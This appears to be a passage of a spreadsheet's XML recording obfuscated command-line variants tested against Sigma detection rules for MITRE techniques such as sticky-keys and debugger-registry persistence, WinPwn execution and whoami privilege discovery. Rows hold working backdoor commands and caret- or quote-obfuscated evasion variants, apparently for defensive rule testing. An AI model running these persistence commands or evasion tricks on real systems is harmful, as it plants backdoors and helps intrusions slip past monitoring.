    <row r="35" ht="15.75" customHeight="1" s="42">
      <c r="A35" s="43" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B35" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_cmd_sticky_keys_replace</t>
        </is>
      </c>
      <c r="C35" s="44" t="inlineStr">
        <is>
          <t>Persistence Via Sticky Key Backdoor</t>
        </is>
      </c>
      <c r="D35" s="44" t="inlineStr">
        <is>
          <t>1070db9a-3e5d-412e-8e7b-7183b616e1b3</t>
        </is>
      </c>
      <c r="E35" s="43" t="inlineStr">
        <is>
          <t>"cmd.exe" /c c^opy /y %SystemRoot%\System32\cmd.exe %SystemRoot%\System32\sethc.exe</t>
        </is>
      </c>
      <c r="F35" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G35" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H35" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I35" s="43" t="n"/>
      <c r="J35" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K35" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1" s="42">
      <c r="A36" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B36" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_install_reg_debugger_backdoor</t>
        </is>
      </c>
      <c r="C36" s="44" t="inlineStr">
        <is>
          <t>Suspicious Debugger Registration Cmdline</t>
        </is>
      </c>
      <c r="D36" s="44" t="inlineStr">
        <is>
          <t>ae215552-081e-44c7-805f-be16f975c8a2</t>
        </is>
      </c>
      <c r="E36" s="44" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$input_table = "osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe".split(",")
$Name = "Debugger"
$Value = "C:\windows\system32\cmd.exe"
Foreach ($item in $input_table){
  $item = $item.trim()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F36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H36" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I36" s="43" t="n"/>
      <c r="J36" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K36" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B37" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_install_reg_debugger_backdoor</t>
        </is>
      </c>
      <c r="C37" s="44" t="inlineStr">
        <is>
          <t>Suspicious Debugger Registration Cmdline</t>
        </is>
      </c>
      <c r="D37" s="44" t="inlineStr">
        <is>
          <t>ae215552-081e-44c7-805f-be16f975c8a2</t>
        </is>
      </c>
      <c r="E37" s="44" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$input_table = "osk.""exe, sethc.""exe, utilman.""exe, magnify.""exe, narrator.""exe, DisplaySwitch.""exe, atbroker.""exe".split(",")
$Name = "Debugger"
$Value = "C:\windows\system32\cmd.exe"
Foreach ($item in $input_table){
  $item = $item.trim() -replace '""',''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F37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H37" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I37" s="43" t="n"/>
      <c r="J37" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K37" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="44" t="inlineStr">
        <is>
          <t>t1546.008</t>
        </is>
      </c>
      <c r="B38" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_install_reg_debugger_backdoor</t>
        </is>
      </c>
      <c r="C38" s="44" t="inlineStr">
        <is>
          <t>Suspicious Debugger Registration Cmdline</t>
        </is>
      </c>
      <c r="D38" s="44" t="inlineStr">
        <is>
          <t>ae215552-081e-44c7-805f-be16f975c8a2</t>
        </is>
      </c>
      <c r="E38" s="44" t="inlineStr">
        <is>
          <t>"powershell.exe" &amp; {$input_table = @('osk','sethc','utilman','magnify','narrator','DisplaySwitch','atbroker') | ForEach-Object { "$_`Reference".Replace('Reference','.exe') }
$Name = "Debugger"
$Value = "C:\windows\system32\cmd.exe"
Foreach ($item in $input_table){
  $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
  New-Item -Path $registryPath -Force -ErrorAction Ignore
  New-ItemProperty -Path $registryPath -Name $Name -Value $Value -Force
}}</t>
        </is>
      </c>
      <c r="F38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H38" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I38" s="43" t="n"/>
      <c r="J38" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K38" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="44" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B39" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C39" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D39" s="44" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E39" s="44" t="inlineStr">
        <is>
          <t>"C:\Windows\System32\rundll32.exe" "-sta "{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}</t>
        </is>
      </c>
      <c r="F39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H39" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I39" s="43" t="n"/>
      <c r="J39" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K39" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="44" t="inlineStr">
        <is>
          <t>t1546.015</t>
        </is>
      </c>
      <c r="B40" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_registered_com_objects</t>
        </is>
      </c>
      <c r="C40" s="44" t="inlineStr">
        <is>
          <t>Rundll32 Registered COM Objects</t>
        </is>
      </c>
      <c r="D40" s="44" t="inlineStr">
        <is>
          <t>f1edd233-30b5-4823-9e6a-c4171b24d316</t>
        </is>
      </c>
      <c r="E40" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\System32\rundll32.exe" -st^a {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}</t>
        </is>
      </c>
      <c r="F40" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G40" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H40" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I40" s="44" t="n"/>
      <c r="J40" s="44" t="n">
        <v>2</v>
      </c>
      <c r="K40" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="44" t="n"/>
      <c r="B41" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C41" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D41" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E41" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H41" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I41" s="44" t="n"/>
      <c r="J41" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K41" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" s="42">
      <c r="A42" s="44" t="n"/>
      <c r="B42" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C42" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D42" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E42" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F42" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G42" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H42" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I42" s="43" t="n"/>
      <c r="J42" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K42" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B43" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C43" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D43" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E43" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F43" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G43" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H43" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I43" s="43" t="n"/>
      <c r="J43" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K43" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1" s="42">
      <c r="A44" s="44" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B44" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C44" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D44" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E44" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F44" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G44" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H44" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I44" s="43" t="n"/>
      <c r="J44" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K44" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="43" t="inlineStr">
        <is>
          <t>t1552.001</t>
        </is>
      </c>
      <c r="B45" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C45" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D45" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E45" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F45" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G45" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H45" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I45" s="43" t="n"/>
      <c r="J45" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K45" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B46" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C46" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D46" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E46" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F46" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G46" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H46" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I46" s="43" t="n"/>
      <c r="J46" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K46" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" s="42">
      <c r="A47" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B47" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C47" s="44" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D47" s="44" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E47" s="44" t="inlineStr">
        <is>
          <t>whoami "/priv"</t>
        </is>
      </c>
      <c r="F47" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G47" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H47" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I47" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J47" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K47" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" s="42">
      <c r="A48" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B48" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C48" s="44" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D48" s="44" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E48" s="44" t="inlineStr">
        <is>
          <t>whoami "/prIv"</t>
        </is>
      </c>
      <c r="F48" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G48" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H48" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I48" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J48" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K48" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" s="42">
      <c r="A49" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B49" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C49" s="44" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D49" s="44" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E49" s="44" t="inlineStr">
        <is>
          <t>whoami "/priV"</t>
        </is>
      </c>
      <c r="F49" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G49" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H49" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I49" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J49" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K49" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" s="42">
      <c r="A50" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B50" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C50" s="44" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D50" s="44" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E50" s="44" t="inlineStr">
        <is>
          <t>whoami "/PrIv"</t>
        </is>
      </c>
      <c r="F50" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G50" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H50" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I50" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J50" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K50" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" s="42">
      <c r="A51" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B51" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C51" s="44" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D51" s="44" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E51" s="44" t="inlineStr">
        <is>
          <t>whoami "/pRiV"</t>
        </is>
      </c>
      <c r="F51" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G51" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H51" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I51" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J51" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K51" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B52" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C52" s="44" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D52" s="44" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E52" s="44" t="inlineStr">
        <is>
          <t>whoami "/PRIV"</t>
        </is>
      </c>
      <c r="F52" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G52" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H52" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I52" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J52" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K52" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B53" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C53" s="44" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D53" s="44" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E53" s="44" t="inlineStr">
        <is>
          <t>whoami "/PrIV"</t>
        </is>
      </c>
      <c r="F53" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G53" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H53" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I53" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J53" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K53" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" s="42">
      <c r="A54" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B54" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C54" s="44" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D54" s="44" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E54" s="44" t="inlineStr">
        <is>
          <t>whoami /p^rIv</t>
        </is>
      </c>
      <c r="F54" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H54" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I54" s="44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54" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K54" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" s="42">
      <c r="A55" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B55" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C55" s="44" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D55" s="44" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E55" s="44" t="inlineStr">
        <is>
          <t>whoami /"p^riv"</t>
        </is>
      </c>
      <c r="F55" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G55" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H55" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I55" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J55" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K55" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="56" ht="15.75" customHeight="1" s="42">
      <c r="A56" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B56" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C56" s="44" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D56" s="44" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E56" s="44" t="inlineStr">
        <is>
          <t>whoami /p^riV</t>
        </is>
      </c>
      <c r="F56" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H56" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I56" s="44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56" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K56" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="57" ht="15.75" customHeight="1" s="42">
      <c r="A57" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B57" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C57" s="44" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D57" s="44" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E57" s="44" t="inlineStr">
        <is>
          <t>whoami /p^RIV</t>
        </is>
      </c>
      <c r="F57" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H57" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I57" s="44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57" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K57" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="58" ht="15.75" customHeight="1" s="42">
      <c r="A58" s="44" t="inlineStr">
        <is>
          <t>t1033</t>
        </is>
      </c>
      <c r="B58" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_whoami_priv_discovery</t>
        </is>
      </c>
      <c r="C58" s="44" t="inlineStr">
        <is>
          <t>Security Privileges Enumeration Via Whoami.EXE</t>
        </is>
      </c>
      <c r="D58" s="44" t="inlineStr">
        <is>
          <t>97a80ec7-0e2f-4d05-9ef4-65760e634f6b</t>
        </is>
      </c>
      <c r="E58" s="44" t="inlineStr">
        <is>
          <t>whoami -"p^riv"</t>
        </is>
      </c>
      <c r="F58" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G58" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H58" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I58" s="44" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J58" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K58" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="59" ht="15.75" customHeight="1" s="42">
      <c r="A59" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B59" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C59" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D59" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E59" s="44" t="inlineStr">
        <is>
          <t>C:\Windows\System32\rundll32.exe C:\Windows\Temp\legit.dll,#1</t>
        </is>
      </c>
      <c r="F59" s="44" t="b">
        <v>0</v>
      </c>
      <c r="G59" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H59" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I59" s="43" t="n"/>
      <c r="J59" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K59" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="60" ht="15.75" customHeight="1" s="42">
      <c r="A60" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B60" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C60" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D60" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E60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0" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G60" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H60" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I60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0" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K60" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="61" ht="15.75" customHeight="1" s="42">
      <c r="A61" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B61" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
      </c>
      <c r="C61" s="44" t="inlineStr">
        <is>
          <t>HackTool - winPEAS Execution</t>
        </is>
      </c>
      <c r="D61" s="44" t="inlineStr">
        <is>
          <t>98b53e78-ebaf-46f8-be06-421aafd176d9</t>
        </is>
      </c>
      <c r="E61" s="44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1" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G61" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H61" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I61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1" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K61" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="62" ht="15.75" customHeight="1" s="42">
      <c r="A62" s="44" t="inlineStr">
        <is>
          <t>t1046</t>
        </is>
      </c>
      <c r="B62" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpeas</t>
        </is>
